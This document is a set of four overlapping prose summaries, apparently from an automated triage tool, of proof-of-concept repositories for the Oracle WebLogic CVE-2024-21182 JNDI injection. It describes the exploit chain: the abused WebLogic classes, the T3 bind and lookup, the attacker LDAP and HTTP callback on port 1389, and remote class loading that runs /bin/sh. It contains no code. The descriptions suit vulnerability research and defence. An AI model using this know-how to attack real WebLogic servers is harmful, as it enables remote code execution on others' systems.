Oracle WebLogic Server Core Unspecified Vulnerability

This repository is a small, self-contained proof-of-concept exploit for CVE-2024-21182 targeting Oracle WebLogic Server via unauthenticated JNDI injection over the T3 protocol. The repo contains 5 files: a README, two Java files, one Python server, and one Bash automation script. The main exploit logic is in `poc/CVE_2024_21182.java`, which connects to a WebLogic T3 endpoint using `weblogic.jndi.WLInitialContextFactory`, creates an `AggregatableOpaqueReference`, injects a `MessageDestinationReference` whose `destinationJNDIName` points to an attacker LDAP URL, binds it into JNDI under the name `test`, and triggers resolution with `lookup()`. This is intended to force the target to perform a JNDI lookup to attacker infrastructure. The attacker infrastructure is implemented in `exploit/ldap_server.py`. It starts two listeners: a raw TCP listener on port 1389 acting as a simplified LDAP responder, and an HTTP server on port 8888 serving `/Exploit.class`. Although the LDAP response is simplified and does not visibly encode the HTTP codebase in the provided snippet, the repository intent is clearly to support an LDAP-to-HTTP remote class loading chain. The final payload is `exploit/Exploit.java`, a Java `ObjectFactory` whose static initializer executes `/bin/sh -c 'id; uname -a'` and prints the output. This demonstrates successful code execution on a Unix-like victim. The `validate.sh` script automates compilation of the payload, startup of the malicious LDAP/HTTP server, compilation of the T3 client with `lib/wlthint3client.jar`, and execution against `t3://localhost:7001` with LDAP callback `ldap://localhost:1389/Evil`. Overall, this is a real exploit PoC rather than a detector. It is operational but basic: the payload is hardcoded, the LDAP server is minimal, and the automation is geared toward lab validation. The attack vector is network-based and targets exposed WebLogic T3 services, with attacker-controlled LDAP/HTTP endpoints used to deliver the malicious Java class.

This repository is a self-contained lab exploit for Oracle WebLogic Server CVE-2024-21182, described as an unauthenticated T3/IIOP JNDI injection leading to server-side LDAP lookup and, in the provided lab conditions, remote code execution. The repo is not tied to a common exploit framework; it contains custom Java, Python, Bash, and Docker components. Structure and purpose: - poc/CVE_2024_21182.java is the main exploit client. It connects to a WebLogic T3 endpoint, constructs a malicious weblogic.application.naming.MessageDestinationReference, reflectively inserts it into an AggregatableOpaqueReference, binds it into JNDI, and triggers lookup() so the server performs an attacker-controlled LDAP lookup. - exploit/ldap_server.py is the attacker infrastructure. It implements a minimal LDAP server that answers searches with a javaNamingReference containing javaClassName=Exploit, javaFactory=Exploit, and javaCodeBase pointing to an HTTP server. The same script also starts an HTTP server to host the compiled class file. - exploit/Exploit.java is the payload class. Its static initializer executes /bin/sh -c 'id ...; uname -a ...' and writes output to /tmp/RCE_PROOF_CVE_2024_21182 on the victim. - exploit/build.sh recompiles Exploit.java to Java 8 bytecode for compatibility with the lab’s older JDK. - docker-compose.yml provisions a vulnerable WebLogic container and an attacker container exposing the LDAP/HTTP services. - validate.sh automates end-to-end reproduction: waits for WebLogic readiness, copies and compiles the PoC inside the container against the live WebLogic classpath, runs the exploit against 127.0.0.1:7001 with ldap://attacker:1389/Evil, and checks for the proof file. Main exploit capability: The exploit provides unauthenticated network-triggered JNDI injection over T3, causing the target WebLogic server to initiate outbound LDAP and HTTP connections to attacker-controlled infrastructure. In the included lab, this results in arbitrary command execution via remote Java class loading. On newer JDKs or patched systems, the same technique may degrade to SSRF/outbound lookup without RCE. Notable targeting details: The README states Oracle WebLogic Server 12.2.1.4.0 and 14.1.1.0.0 are the CVE-listed affected versions, while the lab uses vulhub/weblogic:12.2.1.3-2018 to reproduce the vulnerable class behavior. The exploit specifically abuses WebLogic classes AggregatableOpaqueReference and MessageDestinationReference to bypass prior protections associated with CVE-2023-21839. Overall, this is a real operational lab exploit with a working payload and attacker infrastructure, not merely a detector or README-only proof of concept.

This repository contains a single Java proof-of-concept exploit (CVE_2024_21182.java) targeting Oracle WebLogic Server's JNDI implementation, specifically for CVE-2024-21182. The exploit demonstrates how an attacker can use the T3 protocol to connect to a vulnerable WebLogic server and bind a malicious AggregatableOpaqueReference object containing a MessageDestinationReference that points to an attacker-controlled LDAP server. This could potentially be used to trigger remote code execution or further attacks via JNDI injection. The code is a standalone POC and does not include a full exploit chain or payload delivery, but it clearly demonstrates the vulnerability mechanism. The README is minimal and only states the vulnerability context. The main fingerprintable endpoints are the T3 and LDAP URLs, which are hardcoded as placeholders in the code.

This repository contains a single Java proof-of-concept exploit for CVE-2024-21182, a JNDI injection vulnerability in Oracle WebLogic Server. The main file, CVE_2024_21182.java, demonstrates how an attacker can use the T3 protocol to connect to a vulnerable WebLogic instance and bind a malicious MessageDestinationReference object that references an attacker-controlled LDAP server. The exploit leverages internal WebLogic classes and Java reflection to craft the payload. The README.md provides a brief description and states the exploit is for educational purposes. The code is a functional POC and does not include a full malicious payload, but it shows the core technique for exploiting the vulnerability. The main network endpoints involved are the target WebLogic server (T3 protocol) and an LDAP server under the attacker's control.